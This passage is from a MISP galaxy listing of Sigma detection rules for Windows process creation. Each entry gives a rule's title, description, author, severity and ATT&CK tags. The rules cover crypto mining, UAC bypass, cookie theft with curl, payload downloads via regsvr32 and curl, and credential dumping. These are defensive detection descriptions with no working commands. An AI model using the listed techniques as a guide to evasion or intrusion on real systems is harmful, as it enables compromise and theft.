logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1562.006', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Potential Crypto Mining Activity

Detects command line parameters or strings often used by crypto miners

Internal MISP references

UUID 66c3b204-9f88-4d0a-a7f7-8a57d521ca55 which can be used as unique global reference for Potential Crypto Mining Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Legitimate use of crypto miners', 'Some build frameworks']
filename proc_creation_win_susp_crypto_mining_monero.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1496']
Related clusters

To see the related clusters, click here.

Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE

Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall

Internal MISP references

UUID a35f5a72-f347-4e36-8895-9869b0d5fc6d which can be used as unique global reference for Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
creation_date 2020/05/25
falsepositive ['Unknown']
filename proc_creation_win_netsh_fw_allow_program_in_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

HackTool - PurpleSharp Execution

Detects the execution of the PurpleSharp adversary simulation tool

Internal MISP references

UUID ff23ffbc-3378-435e-992f-0624dcf93ab4 which can be used as unique global reference for HackTool - PurpleSharp Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/06/18
falsepositive ['Unlikely']
filename proc_creation_win_hktl_purplesharp_indicators.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.t1587', 'attack.resource_development']
Related clusters

To see the related clusters, click here.

Suspicious Usage Of ShellExec_RunDLL

Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack

Internal MISP references

UUID d87bd452-6da1-456e-8155-7dc988157b7d which can be used as unique global reference for Suspicious Usage Of ShellExec_RunDLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_shellexec_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious MSHTA Child Process

Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution

Internal MISP references

UUID 03cc0c25-389f-4bf8-b48d-11878079f1ca which can be used as unique global reference for Suspicious MSHTA Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag
creation_date 2019/01/16
falsepositive ['Printer software / driver installations', 'HP software']
filename proc_creation_win_mshta_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.005', 'car.2013-02-003', 'car.2013-03-001', 'car.2014-04-003']
Related clusters

To see the related clusters, click here.

PUA - CleanWipe Execution

Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.

Internal MISP references

UUID f44800ac-38ec-471f-936e-3fa7d9c53100 which can be used as unique global reference for PUA - CleanWipe Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/18
falsepositive ['Legitimate administrative use (Should be investigated either way)']
filename proc_creation_win_pua_cleanwipe.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of Veeam Dabatase

Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.

Internal MISP references

UUID d55b793d-f847-4eea-b59a-5ab09908ac90 which can be used as unique global reference for Suspicious Child Process Of Veeam Dabatase in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/04
falsepositive No established falsepositives
filename proc_creation_win_mssql_veaam_susp_child_processes.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Active Directory Database Snapshot Via ADExplorer

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.

Internal MISP references

UUID 9212f354-7775-4e28-9c9f-8f0a4544e664 which can be used as unique global reference for Active Directory Database Snapshot Via ADExplorer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_adexplorer_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Suspicious Rundll32 Execution With Image Extension

Detects the execution of Rundll32.exe with DLL files masquerading as image files

Internal MISP references

UUID 4aa6040b-3f28-44e3-a769-9208e5feb5ec which can be used as unique global reference for Suspicious Rundll32 Execution With Image Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023/03/13
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_execution_with_image_extension.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Potential UAC Bypass Via Sdclt.EXE

A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.

Internal MISP references

UUID 40f9af16-589d-4984-b78d-8c2aec023197 which can be used as unique global reference for Potential UAC Bypass Via Sdclt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_sdclt.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Compress Data and Lock With Password for Exfiltration With 7-ZIP

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

Internal MISP references

UUID 9fbf5927-5261-4284-a71d-f681029ea574 which can be used as unique global reference for Compress Data and Lock With Password for Exfiltration With 7-ZIP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/27
falsepositive ['Legitimate activity is expected since compressing files with a password is common.']
filename proc_creation_win_7zip_password_compression.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

New Network Trace Capture Started Via Netsh.EXE

Detects the execution of netsh with the "trace" flag in order to start a network capture

Internal MISP references

UUID d3c3861d-c504-4c77-ba55-224ba82d0118 which can be used as unique global reference for New Network Trace Capture Started Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kutepov Anton, oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_packet_capture.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1040']
Related clusters

To see the related clusters, click here.

Winrar Execution in Non-Standard Folder

Detects a suspicious winrar execution in a folder which is not the default installation folder

Internal MISP references

UUID 4ede543c-e098-43d9-a28f-dd784a13132f which can be used as unique global reference for Winrar Execution in Non-Standard Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tigzy
creation_date 2021/11/17
falsepositive ['Legitimate use of WinRAR in a folder of a software that bundles WinRAR']
filename proc_creation_win_winrar_uncommon_folder_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of Wermgr.EXE

Detects suspicious Windows Error Reporting manager (wermgr.exe) child process

Internal MISP references

UUID 396f6630-f3ac-44e3-bfc8-1b161bc00c4e which can be used as unique global reference for Suspicious Child Process Of Wermgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/14
falsepositive ['Unknown']
filename proc_creation_win_wermgr_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocations - Specific - ProcessCreation

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID 536e2947-3729-478c-9903-745aaffe60d2 which can be used as unique global reference for Suspicious PowerShell Invocations - Specific - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/05
falsepositive ['Unknown']
filename proc_creation_win_powershell_invocation_specific.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

Internal MISP references

UUID d20ee2f4-822c-4827-9e15-41500b1fff10 which can be used as unique global reference for Potential Amazon SSM Agent Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal
creation_date 2023/08/02
falsepositive ['Legitimate activity of system administrators']
filename proc_creation_win_ssm_agent_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.persistence', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Potential Suspicious Windows Feature Enabled - ProcCreation

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Internal MISP references

UUID c740d4cf-a1e9-41de-bb16-8a46a4f57918 which can be used as unique global reference for Potential Suspicious Windows Feature Enabled - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/29
falsepositive ['Legitimate usage of the features listed in the rule.']
filename proc_creation_win_powershell_enable_susp_windows_optional_feature.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Cookies Session Hijacking

Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.

Internal MISP references

UUID 5a6e1e16-07de-48d8-8aae-faa766c05e88 which can be used as unique global reference for Potential Cookies Session Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_curl_cookie_hijacking.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.

Internal MISP references

UUID cb0fe7c5-f3a3-484d-aa25-d350a7912729 which can be used as unique global reference for Suspicious Driver/DLL Installation Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/23
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_driver_install_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Call To Win32_NTEventlogFile Class

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

Internal MISP references

UUID caf201a9-c2ce-4a26-9c3a-2b9525413711 which can be used as unique global reference for Potentially Suspicious Call To Win32_NTEventlogFile Class in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/13
falsepositive ['Unknown']
filename proc_creation_win_susp_nteventlogfile_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Invoke-Obfuscation Via Use Clip

Detects Obfuscated Powershell via use Clip.exe in Scripts

Internal MISP references

UUID e1561947-b4e3-4a74-9bdd-83baed21bdb5 which can be used as unique global reference for Invoke-Obfuscation Via Use Clip in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

SQL Client Tools PowerShell Session Detection

This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

Internal MISP references

UUID a746c9b8-a2fb-4ee5-a428-92bee9e99060 which can be used as unique global reference for SQL Client Tools PowerShell Session Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev) oscd.communitly
creation_date 2020/10/13
falsepositive ['Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.']
filename proc_creation_win_mssql_sqltoolsps_susp_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Filter Driver Unloaded Via Fltmc.EXE

Detect filter driver unloading activity via fltmc.exe

Internal MISP references

UUID 4931188c-178e-4ee7-a348-39e8a7a56821 which can be used as unique global reference for Filter Driver Unloaded Via Fltmc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali
creation_date 2023/02/13
falsepositive ['Unknown']
filename proc_creation_win_fltmc_unload_driver.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1562', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

PowerShell Base64 Encoded IEX Cmdlet

Detects usage of a base64 encoded "IEX" cmdlet in a process command line

Internal MISP references

UUID 88f680b8-070e-402c-ae11-d2914f2257f1 which can be used as unique global reference for PowerShell Base64 Encoded IEX Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/08/23
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_iex.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Driver/DLL Installation Via Odbcconf.EXE

Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.

Internal MISP references

UUID 3f5491e2-8db8-496b-9e95-1029fce852d4 which can be used as unique global reference for Driver/DLL Installation Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized.']
filename proc_creation_win_odbcconf_driver_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Audio Capture via SoundRecorder

Detect attacker collecting audio via SoundRecorder application.

Internal MISP references

UUID 83865853-59aa-449e-9600-74b9d89a6d6e which can be used as unique global reference for Audio Capture via SoundRecorder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate audio capture by legitimate user.']
filename proc_creation_win_soundrecorder_audio_capture.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Remote Access Tool - NetSupport Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 758ff488-18d5-4cbe-8ec4-02b6285a434f which can be used as unique global reference for Remote Access Tool - NetSupport Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/25
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_netsupport.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Malicious PowerShell Commandlets - ProcessCreation

Detects Commandlet names from well-known PowerShell exploitation frameworks

Internal MISP references

UUID 02030f2f-6199-49ec-b258-ea71b07e03dc which can be used as unique global reference for Malicious PowerShell Commandlets - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Unknown']
filename proc_creation_win_powershell_malicious_cmdlets.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1482', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1069.001', 'attack.t1069.002', 'attack.t1069', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Extexport Execution

Extexport.exe loads dll and is execute from other folder the original path

Internal MISP references

UUID fb0b815b-f5f6-4f50-970f-ffe21f253f7a which can be used as unique global reference for Suspicious Extexport Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_extexport.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Msiexec Quiet Installation

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Internal MISP references

UUID 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5 which can be used as unique global reference for Msiexec Quiet Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['WindowsApps installing updates via the quiet flag']
filename proc_creation_win_msiexec_install_quiet.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

Suspicious RDP Redirect Using TSCON

Detects a suspicious RDP session redirect using tscon.exe

Internal MISP references

UUID f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb which can be used as unique global reference for Suspicious RDP Redirect Using TSCON in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/17
falsepositive ['Unknown']
filename proc_creation_win_tscon_rdp_redirect.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1563.002', 'attack.t1021.001', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

PUA - Adidnsdump Execution

This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP

Internal MISP references

UUID 26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160 which can be used as unique global reference for PUA - Adidnsdump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_python_adidnsdump.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

PowerShell Base64 Encoded Reflective Assembly Load

Detects base64 encoded .NET reflective loading of Assembly

Internal MISP references

UUID 62b7ccc9-23b4-471e-aa15-6da3663c4d59 which can be used as unique global reference for PowerShell Base64 Encoded Reflective Assembly Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
creation_date 2022/03/01
falsepositive ['Unlikely']
filename proc_creation_win_powershell_base64_reflection_assembly_load.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027', 'attack.t1620']
Related clusters

To see the related clusters, click here.

Read Contents From Stdin Via Cmd.EXE

Detect the use of "<" to read and potentially execute a file via cmd.exe

Internal MISP references

UUID 241e802a-b65e-484f-88cd-c2dc10f9206d which can be used as unique global reference for Read Contents From Stdin Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/07
falsepositive ['Unknown']
filename proc_creation_win_cmd_stdin_redirect.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Renamed Whoami Execution

Detects the execution of whoami that has been renamed to a different name to avoid detection

Internal MISP references

UUID f1086bf7-a0c4-4a37-9102-01e573caf4a0 which can be used as unique global reference for Renamed Whoami Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/12
falsepositive ['Unknown']
filename proc_creation_win_renamed_whoami.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Visual Studio Code Tunnel Shell Execution

Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.

Internal MISP references

UUID f4a623c2-4ef5-4c33-b811-0642f702c9f1 which can be used as unique global reference for Visual Studio Code Tunnel Shell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Legitimate use of Visual Studio Code tunnel and running code from there']
filename proc_creation_win_vscode_tunnel_remote_shell_.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Rebuild Performance Counter Values Via Lodctr.EXE

Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.

Internal MISP references

UUID cc9d3712-6310-4320-b2df-7cb408274d53 which can be used as unique global reference for Rebuild Performance Counter Values Via Lodctr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/15
falsepositive ['Legitimate usage by an administrator']
filename proc_creation_win_lodctr_performance_counter_tampering.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Network Reconnaissance Activity

Detects a set of suspicious network related commands often used in recon stages

Internal MISP references

UUID e6313acd-208c-44fc-a0ff-db85d572e90e which can be used as unique global reference for Network Reconnaissance Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/07
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_nslookup_domain_discovery.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087', 'attack.t1082', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Rundll32 UNC Path Execution

Detects rundll32 execution where the DLL is located on a remote location (share)

Internal MISP references

UUID 5cdb711b-5740-4fb2-ba88-f7945027afac which can be used as unique global reference for Rundll32 UNC Path Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/10
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_unc_path.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1021.002', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious Add Scheduled Task Parent

Detects suspicious scheduled task creations from a parent stored in a temporary folder

Internal MISP references

UUID 9494479d-d994-40bf-a8b1-eea890237021 which can be used as unique global reference for Suspicious Add Scheduled Task Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/23
falsepositive ['Software installers that run from temporary folders and also install scheduled tasks']
filename proc_creation_win_schtasks_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Regsvr32 HTTP/FTP Pattern

Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.

Internal MISP references

UUID 867356ee-9352-41c9-a8f2-1be690d78216 which can be used as unique global reference for Potentially Suspicious Regsvr32 HTTP/FTP Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/24
falsepositive ['Unknown']
filename proc_creation_win_regsvr32_network_pattern.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Suspicious File Download From IP Via Curl.EXE

Detects potentially suspicious file downloads directly from IP addresses using curl.exe

Internal MISP references

UUID 5cb299fc-5fb1-4d07-b989-0644c68b6043 which can be used as unique global reference for Suspicious File Download From IP Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_curl_download_direct_ip_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

HackTool - SharpUp PrivEsc Tool Execution

Detects the use of SharpUp, a tool for local privilege escalation

Internal MISP references

UUID c484e533-ee16-4a93-b6ac-f0ea4868b2f1 which can be used as unique global reference for HackTool - SharpUp PrivEsc Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/20
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpup.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1615', 'attack.t1569.002', 'attack.t1574.005']
Related clusters

To see the related clusters, click here.

Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE

Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share

Internal MISP references

UUID 044ba588-dff4-4918-9808-3f95e8160606 which can be used as unique global reference for Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_cmd_copy_dmp_from_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access']

Screen Capture Activity Via Psr.EXE

Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.

Internal MISP references

UUID 2158f96f-43c2-43cb-952a-ab4580f32382 which can be used as unique global reference for Screen Capture Activity Via Psr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2019/10/12
falsepositive ['Unknown']
filename proc_creation_win_psr_capture_screenshots.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

Renamed PAExec Execution

Detects execution of renamed version of PAExec. Often used by attackers

Internal MISP references

UUID c4e49831-1496-40cf-8ce1-b53f942b02f9 which can be used as unique global reference for Renamed PAExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jason Lynch
creation_date 2021/05/22
falsepositive ['Weird admins that rename their tools', 'Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing', 'When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]"']
filename proc_creation_win_renamed_paexec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Use of Remote.exe

Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.

Internal MISP references

UUID 4eddc365-79b4-43ff-a9d7-99422dc34b93 which can be used as unique global reference for Use of Remote.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/02
falsepositive ['Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).']
filename proc_creation_win_lolbin_remote.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Use of OpenConsole

Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting

Internal MISP references

UUID 814c95cc-8192-4378-a70a-f1aafd877af1 which can be used as unique global reference for Use of OpenConsole in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/16
falsepositive ['Legitimate use by an administrator']
